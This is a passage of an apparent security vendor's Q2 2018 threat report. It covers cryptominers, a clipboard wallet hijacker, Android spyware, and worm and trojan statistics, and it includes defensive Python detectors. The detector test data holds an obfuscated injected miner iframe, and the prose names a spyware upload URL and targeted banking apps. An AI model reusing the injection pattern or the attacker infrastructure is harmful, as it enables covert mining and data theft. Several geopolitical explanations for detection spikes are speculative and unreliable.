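    out: Dict[str, str] = {}
    for m in ATTR.finditer(raw):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out


def _px(value) -> int:
    try:
        return int(str(value).lower().rstrip("px"))
    except ValueError:
        return 10**6         # missing or non-numeric size: treat as visible


def find_hidden_iframes(html: str) -> List[Dict[str, str]]:
    """Report iframes that are 1x1 or point at a known miner host, after deobfuscation."""
    findings = []
    for m in IFRAME.finditer(deobfuscate(html)):
        a = _attrs(m.group(1))
        src = a.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        known = host in MINER_HOSTS or host.endswith(".coinhive.com")
        tiny = _px(a.get("width")) <= 1 and _px(a.get("height")) <= 1
        if known or tiny:
            findings.append({"src": src, "host": host,
                             "reason": "known miner host" if known else "1x1 hidden frame"})
    return findings


# Constructed page fragments. The shortlink path EXAMPLE is a placeholder, not a real link.
HIDDEN_FRAME = '<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1"></iframe>'
SAMPLE_HTML = ("<html><body><h1>News</h1><script>document.write(unescape('"
               + quote(HIDDEN_FRAME, safe="") + "'))</script></body></html>")
SAMPLE_HTML_B64 = ("<script>document.write(atob('"
                   + base64.b64encode(HIDDEN_FRAME.encode()).decode() + "'))</script>")
BENIGN_HTML = '<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>'

if __name__ == "__main__":
    for page in (SAMPLE_HTML, SAMPLE_HTML_B64, BENIGN_HTML):
        print(find_hidden_iframes(page))
```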
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
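As an added example (not the hijacker's or the report's code), a Python clipboard guard that remembers what the user actually copied and raises an alert when a later clipboard poll holds a different wallet address, replayed over the address pair quoted above. The Base58Check validator is included to show why a checksum alone does not catch the swap: the substituted address is itself well-formed. The copy/poll event sequence is constructed.

```python
"""Detect clipboard wallet-address substitution of the kind described above.
Added example, not the report's code; the copy/poll sequence is constructed."""
import hashlib
import re
from typing import List, Optional, Tuple

# Address shapes the guard recognises (legacy/P2SH Bitcoin, bech32 Bitcoin, Ethereum).
WALLET_PATTERNS = [
    re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),
    re.compile(r"^0x[0-9a-fA-F]{40}$"),
]
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def looks_like_wallet(text: str) -> bool:
    return any(p.match(text.strip()) for p in WALLET_PATTERNS)


def base58check_valid(addr: str) -> bool:
    """True if addr decodes to 21 payload bytes plus a matching 4-byte double-SHA256 checksum."""
    n = 0
    for ch in addr:
        i = B58.find(ch)
        if i < 0:
            return False
        n = n * 58 + i
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(addr) - len(addr.lstrip("1"))   # each leading '1' encodes a 0x00 byte
    raw = b"\x00" * pad + body
    if len(raw) != 25:
        return False
    digest = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()
    return digest[:4] == raw[21:]


class ClipboardGuard:
    """Pairs the text the user copied with what the clipboard holds at each poll."""

    def __init__(self) -> None:
        self.expected: Optional[str] = None
        self.alerts: List[str] = []

    def on_user_copy(self, text: str) -> None:
        # Called from the copy hook: this is what the user meant to paste later.
        self.expected = text

    def poll(self, clipboard_text: str) -> Optional[str]:
        # Called on a timer: a wallet address that differs from the one the user
        # copied, with no new copy in between, is the hijacker's signature.
        if self.expected is None or clipboard_text == self.expected:
            return None
        if looks_like_wallet(self.expected) and looks_like_wallet(clipboard_text):
            alert = f"clipboard address replaced: {self.expected} -> {clipboard_text}"
            self.alerts.append(alert)
            return alert
        return None


# Constructed sequence using the address pair quoted in the report.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SWAPPED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def replay(events: List[Tuple[str, str]]) -> List[str]:
    """Replay ('copy', text) / ('poll', text) events and return the alerts raised."""
    guard = ClipboardGuard()
    for kind, text in events:
        if kind == "copy":
            guard.on_user_copy(text)
        else:
            guard.poll(text)
    return guard.alerts


if __name__ == "__main__":
    print(replay([("copy", COPIED), ("poll", COPIED), ("poll", SWAPPED)]))
```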
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
- Version-1: Naver Defender
- Version-2: Netease Defender
- Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contacts' id, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server http://cgalim.com/admin/hr/pu/pu.php?do=upload
KevDroid records the victim's every phone call, then encrypts it and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.
- Version-1: Dardesh Google Play Services Instant Apps
- Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has four different versions:
- Version-1: Telegram Groups انتخاب دھم
- Version-2: Postrall Yes For Referendum انتخاب دھم
- Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
- Version-4: VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect browser data
- Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
- Extracts photos, audio and videos
- Records the screen
- Executes shell commands
- Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi always turned on
Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App: Distribution
- FlexiSpy: MBackup
- HelloSpy: ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
- Mobile Spy: 随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
- Version 1: Adobe Flash Player
- Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
- Send_SMS - extract SMS content and send it to the C&C server
- Send_USSD - send the USSD to the C&C server
- Gethistory - monitor browser history
- Start_AllApp - gather info about installed applications
- Send_call - set the Intent action to call
- Forward_call - forward incoming calls
- ResForward_call - reset call forwarding
- Go_Smsmnd - delete SMS content
- Go_GetAlls - get SMS history
- Dell_sms - delete SMS content in a conversation
- Send_spam - send spam SMS
- Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, as you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp
Here are some commands from its Command and Control server:
- contacts - Get contact details and email id
- Mute - Set action to mute
- Mms - Get MMS content
- info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
- Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
- Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1:
CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1:
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, every one of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
- Version-1: Netflix Hack Instagram Hack
- Version-2: TSF Launcher
- Version-3: Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the No. 1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
Global Threat Report Q2 2018 Edition
Page 50 of 73
5.2.4 Exploits
Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to “kill” or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information, but merely to have fun at the victim’s expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application”, or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. They include free toolbars, adware, and “system optimizers”.
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.
Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.
7.9 Croatia
